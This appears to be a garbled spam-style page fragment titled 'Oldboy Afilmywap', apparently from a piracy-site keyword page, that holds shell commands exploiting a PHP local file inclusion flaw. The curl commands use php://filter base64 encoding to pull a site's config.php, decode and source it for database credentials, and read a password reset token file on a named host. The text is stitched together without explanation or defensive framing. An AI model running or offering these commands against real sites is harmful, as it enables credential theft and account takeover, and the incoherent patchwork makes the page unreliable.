Oldboy Afilmywap -

# 1. Grab config.php via LFI + php://filter CFG_B64=$(curl -s "$TARGET/watch.php?movie=php://filter/convert.base64-encode/resource=inc/config.php" | grep -oP '[A-Za-z0-9+/=]+' ) echo "$CFG_B64" | base64 -d > config.php source config.php # sets $db_user, $db_pass, etc.

$ curl -s "http://oldboy.afilmywap.com/watch.php?movie=php://filter/convert.base64-encode/resource=/tmp/reset_token_8f3d2a.txt" \ | base64 -d oldboy afilmywap